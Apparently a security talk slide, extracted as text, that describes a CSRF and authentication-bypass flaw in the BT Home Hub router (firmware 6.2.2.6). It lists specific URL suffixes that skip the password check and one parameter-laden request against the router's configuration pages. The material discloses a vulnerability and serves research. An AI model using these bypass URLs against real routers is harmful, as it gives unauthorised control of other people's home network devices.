Personal Fav. #1:
CSRF + auth bypass (pt 2)
çReal example: BT Home Hub (tested on firmware 6.2.2.6 )
¼possibly the most popular DSL router in the UK
çAuth bypass found via URL fuzzing [link]
çWeb server accepts multiple representations of URLs, some of which are not checked for password
çWe append special symbols after directory name. i.e.:
¼/cgi/b/secpol/cfg/%5C
¼/cgi/b/secpol/cfg//
¼/cgi/b/secpol/cfg/%
¼/cgi/b/secpol/cfg/~
çIf we need to submit parameters, we append them after double special symbols: /cgi/b/_wli_/cfg//?ce=1&be=1&l0=4&l1=0